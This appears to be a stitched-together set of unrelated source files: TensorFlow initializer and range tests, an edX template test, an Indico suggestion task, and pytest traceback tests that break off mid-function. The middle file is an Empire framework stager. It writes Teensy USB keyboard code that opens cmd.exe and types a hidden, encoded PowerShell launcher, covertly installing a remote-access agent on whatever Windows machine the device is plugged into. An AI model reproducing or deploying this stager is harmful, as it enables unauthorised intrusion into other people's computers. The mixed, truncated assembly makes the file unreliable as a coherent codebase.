# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
# Returns true iff the two initializers produce the same tensor to
# within a tiny tolerance.
def identicaltest(tc, init1, init2, shape=None):
"""Tests if two initializations are identical to within tiny tolerances.
Args:
tc: An instance of TensorFlowTestCase.
init1: An Initializer that generates a tensor of a given shape
init2: An Initializer that generates a tensor of a given shape
shape: Shape of the tensor to initialize or `None` to use a vector of length
100.
Returns:
True or False as determined by test.
"""
if shape is None:
shape = [100]
with tc.test_session(graph=ops.Graph()):
t1 = init1(shape).eval()
with tc.test_session(graph=ops.Graph()):
t2 = init2(shape).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def duplicated_initializer(tc, init, graph_seed, shape=None):
"""Tests duplicated random initializer within the same graph.
This test generates two random kernels from the same initializer to the same
graph, and checks if the results are close enough. Even given the same global,
seed, two different instances of random kernels should generate different
results.
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
graph_seed: A graph-level seed to use.
shape: Shape of the tensor to initialize or `None` to use a vector of length
100.
Returns:
True or False as determined by test.
"""
if shape is None:
shape = [100]
with tc.test_session(graph=ops.Graph()):
random_seed.set_random_seed(graph_seed)
t1 = init(shape).eval()
t2 = init(shape).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def _init_sampler(tc, init, num):
"""Returns a func to generate a random tensor of shape [num].
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
num: Size of 1D tensor to create.
Returns:
Function to generate a random tensor.
"""
def func():
with tc.test_session(use_gpu=True):
return init([num]).eval()
return func
class ConstantInitializersTest(test.TestCase):
def testZerosInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.zeros_initializer())
x.initializer.run()
self.assertAllEqual(x.eval(), np.zeros(shape))
def testOnesInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.ones_initializer())
x.initializer.run()
self.assertAllEqual(x.eval(), np.ones(shape))
def testConstantZeroInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.constant_initializer(0.0))
x.initializer.run()
self.assertAllEqual(x.eval(), np.zeros(shape))
def testConstantOneInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.constant_initializer(1.0))
x.initializer.run()
self.assertAllEqual(x.eval(), np.ones(shape))
def testConstantIntInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x",
shape=shape,
dtype=dtypes.int32,
initializer=init_ops.constant_initializer(7))
x.initializer.run()
self.assertEqual(x.dtype.base_dtype, dtypes.int32)
self.assertAllEqual(x.eval(), 7 * np.ones(shape, dtype=np.int32))
def _testNDimConstantInitializer(self, name, value, shape, expected):
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
x = variable_scope.get_variable(name, shape=shape, initializer=init)
x.initializer.run()
actual = array_ops.reshape(x, [-1]).eval()
self.assertEqual(len(actual), len(expected))
for a, e in zip(actual, expected):
self.assertEqual(a, e)
def testNDimConstantInitializer(self):
value = [0, 1, 2, 3, 4, 5]
shape = [2, 3]
expected = list(value)
self._testNDimConstantInitializer("list", value, shape, expected)
self._testNDimConstantInitializer("ndarray",
np.asarray(value), shape, expected)
self._testNDimConstantInitializer("2D-ndarray",
np.asarray(value).reshape(tuple(shape)),
shape, expected)
def _testNDimConstantInitializerLessValues(self, name, value, shape,
expected):
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
x = variable_scope.get_variable(name, shape=shape, initializer=init)
x.initializer.run()
actual = array_ops.reshape(x, [-1]).eval()
self.assertGreater(len(actual), len(expected))
for i in xrange(len(actual)):
a = actual[i]
e = expected[i] if i < len(expected) else expected[-1]
self.assertEqual(a, e)
def testNDimConstantInitializerLessValues(self):
value = [0, 1, 2, 3, 4, 5]
shape = [2, 4]
expected = list(value)
self._testNDimConstantInitializerLessValues("list", value, shape, expected)
self._testNDimConstantInitializerLessValues("ndarray",
np.asarray(value), shape,
expected)
self._testNDimConstantInitializerLessValues(
"2D-ndarray", np.asarray(value).reshape(tuple([2, 3])), shape, expected)
def _testNDimConstantInitializerMoreValues(self, value, shape):
ops.reset_default_graph()
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
self.assertRaises(
ValueError,
variable_scope.get_variable,
"x",
shape=shape,
initializer=init)
def testNDimConstantInitializerMoreValues(self):
value = [0, 1, 2, 3, 4, 5, 6, 7]
shape = [2, 3]
self._testNDimConstantInitializerMoreValues(value, shape)
self._testNDimConstantInitializerMoreValues(np.asarray(value), shape)
self._testNDimConstantInitializerMoreValues(
np.asarray(value).reshape(tuple([2, 4])), shape)
class RandomNormalInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.random_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.random_normal_initializer,
0.0,
1.0,
dtype=dtypes.string)
class TruncatedNormalInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.truncated_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.truncated_normal_initializer,
0.0,
1.0,
dtype=dtypes.string)
class RandomUniformInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64, dtypes.int64]:
init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
init2 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64, dtypes.int32, dtypes.int64]:
init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
init2 = init_ops.random_uniform_initializer(0, 7, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.random_uniform_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
class UniformUnitScalingInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
init2 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
init3 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
init4 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init3, init4))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
init2 = init_ops.uniform_unit_scaling_initializer(seed=2, dtype=dtype)
init3 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
self.assertFalse(identicaltest(self, init1, init3))
self.assertFalse(identicaltest(self, init2, init3))
def testZeroSize(self):
shape = [0, 2]
with self.test_session():
x = variable_scope.get_variable(
"x",
shape=shape,
initializer=init_ops.uniform_unit_scaling_initializer())
variables.global_variables_initializer().run()
self.assertAllEqual(shape, x.eval().shape)
def testDuplicatedInitializer(self):
init = init_ops.uniform_unit_scaling_initializer()
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.uniform_unit_scaling_initializer,
dtype=dtypes.string)
# TODO(vrv): move to sequence_ops_test?
class RangeTest(test.TestCase):
def _Range(self, start, limit, delta):
with self.test_session(use_gpu=True):
tf_ans = math_ops.range(start, limit, delta, name="range")
self.assertEqual([len(np.arange(start, limit, delta))],
tf_ans.get_shape())
return tf_ans.eval()
def testBasic(self):
self.assertTrue(
np.array_equal(self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4])))
self.assertTrue(np.array_equal(self._Range(0, 5, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(self._Range(0, 6, 2), np.array([0, 2, 4])))
self.assertTrue(
np.array_equal(self._Range(13, 32, 7), np.array([13, 20, 27])))
self.assertTrue(
np.array_equal(
self._Range(100, 500, 100), np.array([100, 200, 300, 400])))
self.assertEqual(math_ops.range(0, 5, 1).dtype, dtypes.int32)
def testLimitOnly(self):
with self.test_session(use_gpu=True):
self.assertAllEqual(np.arange(5), math_ops.range(5).eval())
def testEmpty(self):
for start in 0, 5:
self.assertTrue(np.array_equal(self._Range(start, start, 1), []))
def testNonInteger(self):
self.assertTrue(
np.allclose(self._Range(0, 2, 0.5), np.array([0, 0.5, 1, 1.5])))
self.assertTrue(np.allclose(self._Range(0, 5, 2.5), np.array([0, 2.5])))
self.assertTrue(
np.allclose(self._Range(0, 3, 0.9), np.array([0, 0.9, 1.8, 2.7])))
self.assertTrue(
np.allclose(
self._Range(100., 500., 100.), np.array([100, 200, 300, 400])))
self.assertEqual(math_ops.range(0., 5., 1.).dtype, dtypes.float32)
def testNegativeDelta(self):
self.assertTrue(
np.array_equal(self._Range(5, -1, -1), np.array([5, 4, 3, 2, 1, 0])))
self.assertTrue(
np.allclose(self._Range(2.5, 0, -0.5), np.array([2.5, 2, 1.5, 1, 0.5])))
self.assertTrue(
np.array_equal(self._Range(-5, -10, -3), np.array([-5, -8])))
def testDType(self):
zero_int32 = math_ops.cast(0, dtypes.int32)
zero_int64 = math_ops.cast(0, dtypes.int64)
zero_float32 = math_ops.cast(0, dtypes.float32)
zero_float64 = math_ops.cast(0, dtypes.float64)
self.assertEqual(math_ops.range(zero_int32, 0, 1).dtype, dtypes.int32)
self.assertEqual(math_ops.range(zero_int64, 0, 1).dtype, dtypes.int64)
self.assertEqual(math_ops.range(zero_float32, 0, 1).dtype, dtypes.float32)
self.assertEqual(math_ops.range(zero_float64, 0, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(zero_int32, zero_int64, 1).dtype, dtypes.int64)
self.assertEqual(
math_ops.range(zero_int64, zero_float32, 1).dtype, dtypes.float32)
self.assertEqual(
math_ops.range(zero_float32, zero_float64, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(zero_float64, zero_int32, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.int32).dtype, dtypes.int32)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.int64).dtype, dtypes.int64)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.float32).dtype, dtypes.float32)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.float64).dtype, dtypes.float64)
# TODO(vrv): move to sequence_ops_test?
class LinSpaceTest(test.TestCase):
def _gpu_modes(self):
if test.is_gpu_available():
return [False, True]
else:
return [False]
def _LinSpace(self, start, stop, num):
# NOTE(touts): Needs to pass a graph to get a new session each time.
with ops.Graph().as_default() as graph:
with self.test_session(graph=graph, force_gpu=self.force_gpu):
tf_ans = math_ops.linspace(start, stop, num, name="linspace")
self.assertEqual([num], tf_ans.get_shape())
return tf_ans.eval()
def testPositive(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(1., 5., 3), np.array([1., 3., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(1., 5., 4), np.array([1., 7. / 3., 11. / 3., 5.]),
1e-5)
def testNegative(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 2), np.array([-1., -5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 3), np.array([-1., -3., -5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 4),
np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5)
def testNegativeToPositive(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 3), np.array([-1., 2., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 4), np.array([-1., 1., 3., 5.]), 1e-5)
def testPoint(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] * 4), 1e-5)
class DeviceTest(test.TestCase):
def testNoDevice(self):
with ops.Graph().as_default():
var = variables.Variable([[1.0, 1.0]])
self.assertDeviceEqual(None, var.device)
self.assertDeviceEqual(None, var.initializer.device)
def testDevice(self):
with ops.Graph().as_default():
with ops.device("/job:ps"):
var = variables.Variable([[1.0, 1.0]])
self.assertDeviceEqual("/job:ps", var.device)
self.assertDeviceEqual("/job:ps", var.initializer.device)
class OrthogonalInitializerTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2, (10, 10)))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2, (10, 10)))
def testDuplicatedInitializer(self):
init = init_ops.orthogonal_initializer()
self.assertFalse(duplicated_initializer(self, init, 1, (10, 10)))
def testInvalidDataType(self):
self.assertRaises(
ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string)
def testInvalidShape(self):
init1 = init_ops.orthogonal_initializer()
with self.test_session(graph=ops.Graph(), use_gpu=True):
self.assertRaises(ValueError, init1, shape=[5])
def testGain(self):
shape = (10, 10)
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(gain=3.14, seed=1, dtype=dtype)
with self.test_session(graph=ops.Graph(), use_gpu=True):
t1 = init1(shape).eval()
with self.test_session(graph=ops.Graph(), use_gpu=True):
t2 = init2(shape).eval()
return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15)
def testShapesValues(self):
for dtype in [dtypes.float32, dtypes.float64]:
for shape in [(10, 10), (10, 9, 8), (100, 5, 5), (50, 40), (40, 50)]:
init = init_ops.orthogonal_initializer(dtype=dtype)
tol = 1e-5 if dtype == dtypes.float32 else 1e-12
with self.test_session(graph=ops.Graph(), use_gpu=True):
# Check the shape
t = init(shape).eval()
self.assertAllEqual(shape, t.shape)
# Check orthogonality by computing the inner product
t = t.reshape((np.prod(t.shape[:-1]), t.shape[-1]))
if t.shape[0] > t.shape[1]:
self.assertAllClose(
np.dot(t.T, t), np.eye(t.shape[1]), rtol=tol, atol=tol)
else:
self.assertAllClose(
np.dot(t, t.T), np.eye(t.shape[0]), rtol=tol, atol=tol)
if __name__ == "__main__":
test.main()
|
y12uc231/edx-platform | refs/heads/master | common/lib/xmodule/xmodule/tests/test_mako_module.py | 261 | """ Test mako_module.py """
from unittest import TestCase
from mock import Mock
from xmodule.mako_module import MakoModuleDescriptor
class MakoModuleTest(TestCase):
""" Test MakoModuleDescriptor """
def test_render_template_check(self):
mock_system = Mock()
mock_system.render_template = None
with self.assertRaises(TypeError):
MakoModuleDescriptor(mock_system, {})
del mock_system.render_template
with self.assertRaises(TypeError):
MakoModuleDescriptor(mock_system, {})
|
frohoff/Empire | refs/heads/master | lib/stagers/windows/teensy.py | 12 | from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'TeensyLauncher',
'Author': ['@matterpreter'],
'Description': ('Generates a Teensy script that runes a one-liner stage0 launcher for Empire.'),
'Comments': [
''
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output duckyscript to.',
'Required' : True,
'Value' : '/tmp/teensy.ino'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
elif obfuscate and "launcher" in obfuscateCommand.lower():
print helpers.color("[!] If using obfuscation, LAUNCHER obfuscation cannot be used in the teensy stager.")
return ""
else:
enc = launcher.split(" ")[-1]
sendEnc = "Keyboard.print(\""
sendEnc += enc
sendEnc += "\");\n"
teensyCode = "unsigned int lock_check_wait = 1000;\n"
teensyCode += "int ledKeys(void) {return int(keyboard_leds);}\n"
teensyCode += "boolean isLockOn(void) {\n"
teensyCode += " return ((ledKeys() & 2) == 2) ? true : false;\n"
teensyCode += "}\n\n"
teensyCode += "void clearKeys (){\n"
teensyCode += " delay(200);\n"
teensyCode += " Keyboard.set_key1(0);\n"
teensyCode += " Keyboard.set_key2(0);\n"
teensyCode += " Keyboard.set_key3(0);\n"
teensyCode += " Keyboard.set_key4(0);\n"
teensyCode += " Keyboard.set_key5(0);\n"
teensyCode += " Keyboard.set_key6(0);\n"
teensyCode += " Keyboard.set_modifier(0);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += "}\n\n"
teensyCode += "void toggleLock(void) {\n"
teensyCode += " Keyboard.set_key1(KEY_CAPS_LOCK);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void wait_for_drivers(void) {\n"
teensyCode += " boolean numLockTrap = isLockOn();\n"
teensyCode += " while(numLockTrap == isLockOn()) {\n"
teensyCode += " toggleLock();\n"
teensyCode += " delay(lock_check_wait);\n"
teensyCode += " }\n"
teensyCode += " toggleLock();\n"
teensyCode += " delay(lock_check_wait);\n"
teensyCode += "}\n\n"
teensyCode += "void win_minWindows(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.set_key1(KEY_M);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_restoreWindows(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " Keyboard.set_key1(KEY_M);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_run(void) {\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.set_key1(KEY_R);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_openCmd(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " win_run();\n"
teensyCode += " Keyboard.print(\"cmd.exe\");\n"
teensyCode += " Keyboard.set_key1(KEY_ENTER);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void empire(void) {\n"
teensyCode += " wait_for_drivers();\n"
teensyCode += " win_minWindows();\n"
teensyCode += " delay(1000);\n"
teensyCode += " win_openCmd();\n"
teensyCode += " delay(1000);\n"
teensyCode += " Keyboard.print(\"powershell -W Hidden -nop -noni -enc \");\n"
teensyCode += " "
teensyCode += sendEnc
teensyCode += " Keyboard.set_key1(KEY_ENTER);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += " win_restoreWindows();\n"
teensyCode += "}\n\n"
teensyCode += "void setup(void) {\n"
teensyCode += " empire();\n"
teensyCode += "}\n\n"
teensyCode += "void loop() {}"
return teensyCode
|
Ictp/indico | refs/heads/master | indico/modules/scheduler/tasks/suggestions.py | 2 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico; if not, see <http://www.gnu.org/licenses/>.
from MaKaC.user import AvatarHolder
from indico.modules.scheduler.tasks.periodic import PeriodicTask
from indico.util.suggestions import get_category_scores
from indico.util.redis import write_client as redis_write_client
import indico.util.redis.suggestions as redis_suggestions
# Minimum score for a category to be suggested
SUGGESTION_MIN_SCORE = 0.25
class CategorySuggestionTask(PeriodicTask):
def _update_suggestions(self, avatar):
for category, score in get_category_scores(avatar).iteritems():
if score < SUGGESTION_MIN_SCORE:
continue
#print 'Suggest category for %r: %r (%.03f)' % (avatar, category, score)
redis_suggestions.suggest(avatar, 'category', category.getId(), score)
def run(self):
if not redis_write_client:
return
while True:
avatar_id = redis_suggestions.next_scheduled_check()
if avatar_id is None:
break
avatar = AvatarHolder().getById(avatar_id)
if avatar:
self._update_suggestions(avatar)
redis_suggestions.unschedule_check(avatar_id)
|
mohammed-alfatih/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pytest/testing/code/test_excinfo.py | 165 | # -*- coding: utf-8 -*-
import _pytest
import py
import pytest
from _pytest._code.code import FormattedExcinfo, ReprExceptionInfo
queue = py.builtin._tryimport('queue', 'Queue')
failsonjython = pytest.mark.xfail("sys.platform.startswith('java')")
from test_source import astonly
try:
import importlib
except ImportError:
invalidate_import_caches = None
else:
invalidate_import_caches = getattr(importlib, "invalidate_caches", None)
import pytest
pytest_version_info = tuple(map(int, pytest.__version__.split(".")[:3]))
class TWMock:
def __init__(self):
self.lines = []
def sep(self, sep, line=None):
self.lines.append((sep, line))
def line(self, line, **kw):
self.lines.append(line)
def markup(self, text, **kw):
return text
fullwidth = 80
def test_excinfo_simple():
try:
raise ValueError
except ValueError:
info = _pytest._code.ExceptionInfo()
assert info.type == ValueError
def test_excinfo_getstatement():
def g():
raise ValueError
def f():
g()
try:
f()
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
linenumbers = [_pytest._code.getrawcode(f).co_firstlineno - 1 + 3,
_pytest._code.getrawcode(f).co_firstlineno - 1 + 1,
_pytest._code.getrawcode(g).co_firstlineno - 1 + 1, ]
l = list(excinfo.traceback)
foundlinenumbers = [x.lineno for x in l]
assert foundlinenumbers == linenumbers
#for x in info:
# print "%s:%d %s" %(x.path.relto(root), x.lineno, x.statement)
#xxx
# testchain for getentries test below
def f():
#
raise ValueError
#
def g():
#
__tracebackhide__ = True
f()
#
def h():
#
g()
#
class TestTraceback_f_g_h:
def setup_method(self, method):
try:
h()
except ValueError:
self.excinfo = _pytest._code.ExceptionInfo()
def test_traceback_entries(self):
tb = self.excinfo.traceback
entries = list(tb)
assert len(tb) == 4 # maybe fragile test
assert len(entries) == 4 # maybe fragile test
names = ['f', 'g', 'h']
for entry in entries:
try:
names.remove(entry.frame.code.name)
except ValueError:
pass
assert not names
def test_traceback_entry_getsource(self):
tb = self.excinfo.traceback
s = str(tb[-1].getsource() )
assert s.startswith("def f():")
assert s.endswith("raise ValueError")
@astonly
@failsonjython
def test_traceback_entry_getsource_in_construct(self):
source = _pytest._code.Source("""\
def xyz():
try:
raise ValueError
except somenoname:
pass
xyz()
""")
try:
exec (source.compile())
except NameError:
tb = _pytest._code.ExceptionInfo().traceback
print (tb[-1].getsource())
s = str(tb[-1].getsource())
assert s.startswith("def xyz():\n try:")
assert s.strip().endswith("except somenoname:")
def test_traceback_cut(self):
co = _pytest._code.Code(f)
path, firstlineno = co.path, co.firstlineno
traceback = self.excinfo.traceback
newtraceback = traceback.cut(path=path, firstlineno=firstlineno)
assert len(newtraceback) == 1
newtraceback = traceback.cut(path=path, lineno=firstlineno+2)
assert len(newtraceback) == 1
def test_traceback_cut_excludepath(self, testdir):
p = testdir.makepyfile("def f(): raise ValueError")
excinfo = pytest.raises(ValueError, "p.pyimport().f()")
basedir = py.path.local(pytest.__file__).dirpath()
newtraceback = excinfo.traceback.cut(excludepath=basedir)
for x in newtraceback:
if hasattr(x, 'path'):
assert not py.path.local(x.path).relto(basedir)
assert newtraceback[-1].frame.code.path == p
def test_traceback_filter(self):
traceback = self.excinfo.traceback
ntraceback = traceback.filter()
assert len(ntraceback) == len(traceback) - 1
def test_traceback_recursion_index(self):
def f(n):
if n < 10:
n += 1
f(n)
excinfo = pytest.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex == 3
def test_traceback_only_specific_recursion_errors(self, monkeypatch):
def f(n):
if n == 0:
raise RuntimeError("hello")
f(n-1)
excinfo = pytest.raises(RuntimeError, f, 100)
monkeypatch.delattr(excinfo.traceback.__class__, "recursionindex")
repr = excinfo.getrepr()
assert "RuntimeError: hello" in str(repr.reprcrash)
def test_traceback_no_recursion_index(self):
def do_stuff():
raise RuntimeError
def reraise_me():
import sys
exc, val, tb = sys.exc_info()
